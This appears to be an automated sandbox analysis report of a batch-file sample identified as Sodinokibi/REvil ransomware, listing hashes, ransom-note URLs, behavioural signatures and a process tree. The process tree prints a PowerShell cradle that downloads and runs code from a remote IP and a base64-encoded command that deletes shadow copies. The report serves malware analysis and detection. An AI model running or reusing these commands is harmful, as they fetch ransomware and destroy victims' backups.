Analysis
- max time kernel: 25s
- max time network: 35s
- platform: windows7_x64
- resource: win7v200430
- submitted: 02-05-2020 20:10
Static task: static1
Behavioral task: behavioral1
- Sample: 9LqmY8y8.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: 9LqmY8y8.bat
- Resource: win10v200430
General
- Target: 9LqmY8y8.bat
- Size: 189B
- MD5: 409cb77ca0557e5e095df01063ea8ff3
- SHA1: e664180fcedc6210419e8382edcb017f9dcd2363
- SHA256: f4cc72498bffce63ae55294e28cdf826ee706385369edbba23a3953c60097a19
- SHA512: 88cda05b09f04c3ea95eceec40d441f616b9cce3e5b39e569ced01bb030ba8cc40a77f49521d3ca7db7db838f93895cfec52248b4d0a5f58ba36344cd39c85e8
Malware Config
Extracted from: http://185.103.242.78/pastes/9LqmY8y8
Extracted from: C:\cri431j2le-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/658B6E0D1FEB0F68
  - http://decryptor.cc/658B6E0D1FEB0F68
Signatures
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  - PID 112: powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  (description / pid / process / target process)
  - PID 288 wrote to memory of 112: cmd.exe -> powershell.exe
  - PID 112 wrote to memory of 1800: powershell.exe -> powershell.exe
  - PID 112 wrote to memory of 1800: powershell.exe -> powershell.exe
  - PID 112 wrote to memory of 1800: powershell.exe -> powershell.exe
  - PID 112 wrote to memory of 1800: powershell.exe -> powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, powershell.exe
  - PID 112: powershell.exe
  - PID 112: powershell.exe
  - PID 112: powershell.exe
  - PID 1800: powershell.exe
  - PID 1800: powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  - flow 1, PID 112: powershell.exe
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Drops file in Program Files directory (18 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\SkipUnprotect.inf (powershell.exe)
  - File opened for modification: \??\c:\program files\UnprotectFind.tif (powershell.exe)
  - File created: \??\c:\program files\cri431j2le-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\DisableTest.midi (powershell.exe)
  - File opened for modification: \??\c:\program files\NewCompress.m4a (powershell.exe)
  - File opened for modification: \??\c:\program files\ResumeRename.csv (powershell.exe)
  - File opened for modification: \??\c:\program files\RemoveFormat.3gp (powershell.exe)
  - File opened for modification: \??\c:\program files\TestOptimize.jpe (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\cri431j2le-readme.txt (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\cri431j2le-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\CheckpointBlock.dxf (powershell.exe)
  - File opened for modification: \??\c:\program files\GrantSkip.vdw (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\cri431j2le-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\MoveSave.ADTS (powershell.exe)
  - File created: \??\c:\program files (x86)\cri431j2le-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\PublishTrace.mp4v (powershell.exe)
  - File opened for modification: \??\c:\program files\AssertWatch.tif (powershell.exe)
  - File opened for modification: \??\c:\program files\OptimizeInitialize.pptx (powershell.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8z0xqy.bmp" (powershell.exe)
- Makes http(s) request (1 IoC)
  Contacts server via http/https, possibly for C2 communication.
  - HTTP URL, flow 1: http://185.103.242.78/pastes/9LqmY8y8
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 112: powershell.exe
  - Token: SeDebugPrivilege, PID 112: powershell.exe
  - Token: SeDebugPrivilege, PID 1800: powershell.exe
  - Token: SeBackupPrivilege, PID 760: vssvc.exe
  - Token: SeRestorePrivilege, PID 760: vssvc.exe
  - Token: SeAuditPrivilege, PID 760: vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 112: powershell.exe
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Enumerates connected drives (3 TTPs)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\9LqmY8y8.bat"
  PID: 288
  Signatures:
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9LqmY8y8');Invoke-CZHNNB;Start-Sleep -s 10000"
    PID: 112
    Signatures:
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1800
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 760
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken